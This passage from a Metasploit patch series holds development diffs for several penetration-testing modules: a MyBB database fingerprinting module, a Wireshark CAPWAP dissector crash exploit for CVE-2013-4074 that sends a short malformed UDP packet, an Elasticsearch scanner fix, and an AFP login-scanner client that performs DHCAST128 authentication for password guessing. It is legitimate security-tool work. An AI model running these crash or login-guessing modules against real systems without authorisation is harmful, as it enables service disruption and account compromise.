"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err From 5dbd124ef9440ae72923fb817d47184b8639c536 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:53:43 -0700 Subject: [PATCH 14/47] Update mybb_get_type_db.rb --- modules/auxiliary/gather/mybb_get_type_db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index 58d01b6d58..ad1e413cab 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary #Check Web-Server _version_server = res['Server'] if _version_server - _version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = " Server Version: #{_version_server}".ljust(40) else _version_server = " Server Version: unknown".ljust(40) end From 7b9b20a07ecf5258fe208f92665abfbc999619bd Mon Sep 17 00:00:00 2001 From: silascutler Date: Mon, 7 Apr 2014 14:30:52 -0400 Subject: [PATCH 15/47] Corrected Spaces Issues Removed extra spaces on line 23&24 --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index 0e8735fdc5..804cc8fcc9 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary 'Silas Cutler ' ], 'License' => MSF_LICENSE - )) + )) register_options( [ From 55d8be8238742b2816a711611c7ad1968fb72b9b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Tue, 29 Apr 2014 22:55:14 +0100 Subject: [PATCH 16/47] Add cve-2013-4074 module to crash dissector capwap --- .../windows/misc/wireshark_capwap_dos.rb | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb new file mode 100644 index 0000000000..818d62692a --- /dev/null +++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb @@ -0,0 +1,67 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = GoodRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS', + 'Description' => %q{ + This module inject malicioous packet udp to crash wireshark + ) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'DisableNops' => 'True', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Wireshark CAPWAP dissector CRASH', + { + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def exploit + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") + buf = "\x90" * 18 + udp_sock.put(buf) + + disconnect_udp + + end +end From b0da032136d572c237ea8b64ee05b35b3095f913 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Tue, 29 Apr 2014 23:06:30 +0100 Subject: [PATCH 17/47] Modified the metadatas --- modules/exploits/windows/misc/wireshark_capwap_dos.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb index 818d62692a..603f5e81ca 100644 --- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb +++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb @@ -13,15 +13,17 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS', + 'Name' => 'Wireshark CAPWAP dissector crash', 'Description' => %q{ - This module inject malicioous packet udp to crash wireshark + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. ) }, 'License' => MSF_LICENSE, 'Author' => [ 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => [ From cbb84e854ca35f66b5b199a63fdedfc52b1d4e9d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 14 May 2014 14:56:40 +0400 Subject: [PATCH 18/47] Update mybb_get_type_db.rb 14.05.2014 Eliminated notes jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 143 +++++++++---------- 1 file changed, 69 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index ad1e413cab..a61c1166d1 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -12,27 +12,19 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + Determine the database in the forum. + This affects versions <= 1.6.12 }, 'Author' => [ - #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 13 2014')) register_options( @@ -43,78 +35,81 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_cgi({ + 'uri' => uri, + 'method' => 'GET',}) + if req.nil? + print_error("Failed to retrieve webpage.") + return Exploit::CheckCode::Unknown + end + if req + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end - #Check Web-Server - _version_server = res['Server'] - if _version_server - _version_server = " Server Version: #{_version_server}".ljust(40) - else - _version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end end def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) + response = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") + print_error("Failed to retrieve webpage.") + return end #Resolve response From 74b491e715ccec4434a537ba87bc5ed69438be8c Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 17 May 2014 11:25:38 +0100 Subject: [PATCH 19/47] Delete wireshark_capwap_dos module --- .../windows/misc/wireshark_capwap_dos.rb | 69 ------------------- 1 file changed, 69 deletions(-) delete mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb deleted file mode 100644 index 603f5e81ca..0000000000 --- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb +++ /dev/null @@ -1,69 +0,0 @@ -# -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = GoodRanking - - include Msf::Exploit::Remote::Udp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector crash', - 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. - ) - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'j0sm1', # Exploit and msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" - ], - 'References' => - [ - [ 'CVE', '2013-4074'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Wireshark CAPWAP dissector CRASH', - { - } - ], - ], - 'Privileged' => false, - 'DisclosureDate' => 'Apr 28 2014', - 'DefaultTarget' => 0)) - - # Protocol capwap needs port 5247 to trigger the dissector in wireshark - register_options([ Opt::RPORT(5247) ], self.class) - - end - - def exploit - - connect_udp - - # We send a packet incomplete to crash dissector - print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") - buf = "\x90" * 18 - udp_sock.put(buf) - - disconnect_udp - - end -end From 21cf0a162cb8619dc950a765cdd49d57be597e5a Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 17 May 2014 11:31:43 +0100 Subject: [PATCH 20/47] Added module to crash capwap dissector in wireshark tool --- .../dos/wireshark/wireshark_capwap_dos.rb | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb new file mode 100644 index 0000000000..603f5e81ca --- /dev/null +++ b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb @@ -0,0 +1,69 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = GoodRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark CAPWAP dissector crash', + 'Description' => %q{ + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. + ) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'DisableNops' => 'True', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Wireshark CAPWAP dissector CRASH', + { + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def exploit + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") + buf = "\x90" * 18 + udp_sock.put(buf) + + disconnect_udp + + end +end From 06912ac2b6180258b0ef8ead30eedfd15795bc27 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 17 May 2014 16:30:29 +0400 Subject: [PATCH 21/47] Update mybb_get_type_db.rb 1.Changed "Rex::Proto::Http::Client" to "Msf::Exploit::Remote::HttpClient" 2.changed the name of the variable "_Version_server". --- modules/auxiliary/gather/mybb_get_type_db.rb | 54 ++++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index a61c1166d1..e007166e77 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -36,24 +36,24 @@ class Metasploit3 < Msf::Auxiliary def check begin uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_cgi({ - 'uri' => uri, - 'method' => 'GET',}) - if req.nil? + res = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) + if res.nil? print_error("Failed to retrieve webpage.") return Exploit::CheckCode::Unknown end - if req - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end + if res.code != 200 print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") return Exploit::CheckCode::Unknown @@ -69,19 +69,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + web_server = res['Server'] + if web_server + web_server = " Server Version: #{web_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + web_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" } }) if response.nil? From e26dee5e22ba0e7327580da2801f2cc3f913d7ad Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 19 May 2014 21:32:30 +0400 Subject: [PATCH 22/47] Update mybb_get_type_db.rb 19/05/2014 I deleted - #return Exploit::CheckCode::Unknown # necessary ???? --- modules/auxiliary/gather/mybb_get_type_db.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e007166e77..b96e7a1a64 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -65,7 +65,6 @@ class Metasploit3 < Msf::Auxiliary php_version = " PHP Version: #{php_version}".ljust(40) else php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? end #Check Web-Server From 21de14ac3d0a28cb58c4e9f1350087eb97ceb344 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 20 May 2014 17:08:12 -0500 Subject: [PATCH 23/47] Initial stab at AFP login scanner --- lib/metasploit/framework/afp/client.rb | 323 ++++++++++++++++++ lib/metasploit/framework/login_scanner/afp.rb | 43 +++ .../framework/login_scanner/result.rb | 2 +- .../metasploit/framework/afp/client_spec.rb | 0 .../framework/login_scanner/afp_spec.rb | 16 + 5 files changed, 383 insertions(+), 1 deletion(-) create mode 100644 lib/metasploit/framework/afp/client.rb create mode 100644 lib/metasploit/framework/login_scanner/afp.rb create mode 100644 spec/lib/metasploit/framework/afp/client_spec.rb create mode 100644 spec/lib/metasploit/framework/login_scanner/afp_spec.rb diff --git a/lib/metasploit/framework/afp/client.rb b/lib/metasploit/framework/afp/client.rb new file mode 100644 index 0000000000..2bc578d7a7 --- /dev/null +++ b/lib/metasploit/framework/afp/client.rb @@ -0,0 +1,323 @@ +# -*- coding: binary -*- +require 'msf/core' +require 'msf/core/exploit/tcp' + +module Metasploit + module Framework + module AFP + module Client + + def next_id + @request_id ||= -1 + @request_id += 1 + + @request_id + end + + def get_info + packet = "\00" # Flag: Request + packet << "\x03" # Command: FPGetSrvrInfo + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << "\x00\x00\x00\x00" # Length + packet << "\x00\x00\x00\x00" # Reserved + + sock.put(packet) + + response = sock.timed_read(1024) + return parse_info_response(response) + end + + def open_session + packet = "\00" # Flag: Request + packet << "\x04" # Command: DSIOpenSession + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << "\x00\x00\x00\x06" # Length + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x01" # Attention Quantum + packet << "\x04" # Length + packet << "\x00\x00\x04\x00" # 1024 + + sock.put(packet) + + response = sock.timed_read(1024) + return parse_open_session_response(response) + end + + def login(user, pass) + if user == '' + return no_user_authent_login + end + + p = OpenSSL::BN.new("BA2873DFB06057D43F2024744CEEE75B", 16) + g = OpenSSL::BN.new("7", 10) + ra = OpenSSL::BN.new('86F6D3C0B0D63E4B11F113A2F9F19E3BBBF803F28D30087A1450536BE979FD42', 16) + ma = g.mod_exp(ra, p) + + padded_user = (user.length + 1) % 2 != 0 ? user + "\x00" : user + bin_user = [padded_user.length, padded_user].pack("Ca*") + + length = 18 + bin_user.length + ma.to_s(2).length + + packet = "\00" # Flag: Request + packet << "\x02" # Command: DSICommand + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << [length].pack('N') # Length (42) + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x12" # AFPCommand: FPLogin (18) + packet << "\x06\x41\x46\x50\x33\x2e\x31" # AFPVersion: AFP3.1 + packet << "\x09\x44\x48\x43\x41\x53\x54\x31\x32\x38" #UAM: DHCAST128 + packet << bin_user # username + packet << ma.to_s(2) # random number + + sock.put(packet) + + begin + response = sock.timed_read(1024, self.login_timeout) + rescue Timeout::Error + #vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)") + return :connection_error + end + + flags, command, request_id, error_code, length, reserved = parse_header(response) + + case error_code + when -5001 #kFPAuthContinue + return parse_login_response_add_send_login_count(response, {:p => p, :g => g, :ra => ra, :ma => ma, + :password => pass, :user => user}) + when -5023 #kFPUserNotAuth (User dosen't exists) + #print_status("AFP #{rhost}:#{rport} User #{user} dosen't exists") + return :skip_user + else + return :connection_error + end + + end + + def close_session + packet = "\00" # Flag: Request + packet << "\x01" # Command: DSICloseSession + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" #Data offset + packet << "\x00\x00\x00\x00" #Length + packet << "\x00\x00\x00\x00" #Reserved + + sock.put(packet) + end + + def no_user_authent_login + packet = "\00" # Flag: Request + packet << "\x02" # Command: DSICommand + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << "\x00\x00\x00\x18" # Length (24) + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x12" # AFPCommand: FPLogin (18) + packet << "\x06\x41\x46\x50\x33\x2e\x31" #AFP3.1 + packet << "\x0f\x4e\x6f\x20\x55\x73\x65\x72\x20\x41\x75\x74\x68\x65\x6e\x74" #UAM: No User Authent + + sock.put(packet) + + begin + response = sock.timed_read(1024, self.login_timeout) + rescue Timeout::Error + vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)") + return :connection_error + end + + flags, command, request_id, error_code, length, reserved = parse_header(response) + + if error_code == 0 + return :true + else + return false + end + end + + def parse_login_response_add_send_login_count(response, data) + dhx_s2civ = 'CJalbert' + dhx_c2civ = 'LWallace' + + flags, command, request_id, error_code, length, reserved = parse_header(response) + body = get_body(response, length) + id, mb, enc_data = body.unpack("nH32a*") + + mb = OpenSSL::BN.new(mb, 16) + k = mb.mod_exp(data[:ra], data[:p] ) + + cipher = OpenSSL::Cipher.new('cast5-cbc').decrypt + cipher.key = k.to_s(2) + cipher.iv = dhx_s2civ + cipher.padding = 0 + + nonce = cipher.update(enc_data) + nonce << cipher.final + nonce = nonce[0..15] + nonce = OpenSSL::BN.new(nonce, 2) + 1 + + plain_text = nonce.to_s(2) + data[:password].ljust(64, "\x00") + cipher = OpenSSL::Cipher.new('cast5-cbc').encrypt + cipher.key = k.to_s(2) + cipher.iv = dhx_c2civ + auth_response = cipher.update(plain_text) + auth_response << cipher.final + + packet = "\00" # Flag: Request + packet << "\x02" # Command: DSICommand + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << [auth_response.length + 2].pack("N") # Length + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x13" # AFPCommand: FPLoginCont (19) + packet << "\x00" + packet << [id].pack('n') + packet << auth_response + + sock.put(packet) + + begin + response = sock.timed_read(1024, self.login_timeout) + rescue Timeout::Error + vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)") + return :connection_error + end + + flags, command, request_id, error_code, length, reserved = parse_header(response) + if error_code == 0 + return true + else + return false + end + end + + def parse_open_session_response(response) + _, _, _, error_code, _, _ = parse_header(response) + return error_code == 0 ? true : false + end + + def parse_info_response(response) + parsed_data = {} + + flags, command, request_id, error_code, length, reserved = parse_header(response) + raise "AFP #{rhost}:#{rport} Server response with error" if error_code != 0 + body = get_body(response, length) + machine_type_offset, afp_versions_offset, uam_count_offset, icon_offset, server_flags = + body.unpack('nnnnn') + + server_name_length = body.unpack('@10C').first + parsed_data[:server_name] = body.unpack("@11A#{server_name_length}").first + + pos = 11 + server_name_length + pos += 1 if pos % 2 != 0 #padding + + server_signature_offset, network_addresses_offset, directory_names_offset, + utf8_servername_offset = body.unpack("@#{pos}nnnn") + + parsed_data[:machine_type] = read_pascal_string(body, machine_type_offset) + parsed_data[:versions] = read_array(body, afp_versions_offset) + parsed_data[:uams] = read_array(body, uam_count_offset) + # skiped icon + parsed_data[:server_flags] = parse_flags(server_flags) + parsed_data[:signature] = body.unpack("@#{server_signature_offset}H32").first + + network_addresses = read_array(body, network_addresses_offset, true) + parsed_data[:network_addresses] = parse_network_addresses(network_addresses) + # skiped directory names + #Error catching for offset issues on this field. Need better error ahndling all through here + begin + parsed_data[:utf8_server_name] = read_utf8_pascal_string(body, utf8_servername_offset) + rescue + parsed_data[:utf8_server_name] = "N/A" + end + + return parsed_data + end + + def parse_header(packet) + header = packet.unpack('CCnNNN') #ruby 1.8.7 don't support unpacking signed integers in big-endian order + header[3] = packet[4..7].reverse.unpack("l").first + return header + end + + def get_body(packet, body_length) + body = packet[16..body_length + 15] + raise "AFP #{rhost}:#{rport} Invalid body length" if body.length != body_length + return body + end + + def read_pascal_string(str, offset) + length = str.unpack("@#{offset}C").first + return str.unpack("@#{offset + 1}A#{length}").first + end + + def read_utf8_pascal_string(str, offset) + length = str.unpack("@#{offset}n").first + return str[offset + 2..offset + length + 1] + end + + def read_array(str, offset, afp_network_address=false) + size = str.unpack("@#{offset}C").first + pos = offset + 1 + + result = [] + size.times do + result << read_pascal_string(str, pos) + pos += str.unpack("@#{pos}C").first + pos += 1 unless afp_network_address + end + return result + end + + def parse_network_addresses(network_addresses) + parsed_addreses = [] + network_addresses.each do |address| + case address.unpack('C').first + when 0 #Reserved + next + when 1 # Four-byte IP address + parsed_addreses << IPAddr.ntop(address[1..4]).to_s + when 2 # Four-byte IP address followed by a two-byte port number + parsed_addreses << "#{IPAddr.ntop(address[1..4])}:#{address[5..6].unpack("n").first}" + when 3 # DDP address (depricated) + next + when 4 # DNS name (maximum of 254 bytes) + parsed_addreses << address[1..address.length - 1] + when 5 # This functionality is deprecated. + next + when 6 # IPv6 address (16 bytes) + parsed_addreses << "[#{IPAddr.ntop(address[1..16])}]" + when 7 # IPv6 address (16 bytes) followed by a two-byte port number + parsed_addreses << "[#{IPAddr.ntop(address[1..16])}]:#{address[17..18].unpack("n").first}" + else # Something wrong? + raise "Error parsing network addresses" + end + end + return parsed_addreses + end + + def parse_flags(flags) + flags = flags.to_s(2) + result = {} + result['Super Client'] = flags[0,1] == '1' ? true : false + result['UUIDs'] = flags[5,1] == '1' ? true : false + result['UTF8 Server Name'] = flags[6,1] == '1' ? true : false + result['Open Directory'] = flags[7,1] == '1' ? true : false + result['Reconnect'] = flags[8,1] == '1' ? true : false + result['Server Notifications'] = flags[9,1] == '1' ? true : false + result['TCP/IP'] = flags[10,1] == '1' ? true : false + result['Server Signature'] = flags[11,1] == '1' ? true : false + result['Server Messages'] = flags[12,1] == '1' ? true : false + result['Password Saving Prohibited'] = flags[13,1] == '1' ? true : false + result['Password Changing'] = flags[14,1] == '1' ? true : false + result['Copy File'] = flags[5,1] == '1' ? true : false + return result + end + + end + end + + end +end + diff --git a/lib/metasploit/framework/login_scanner/afp.rb 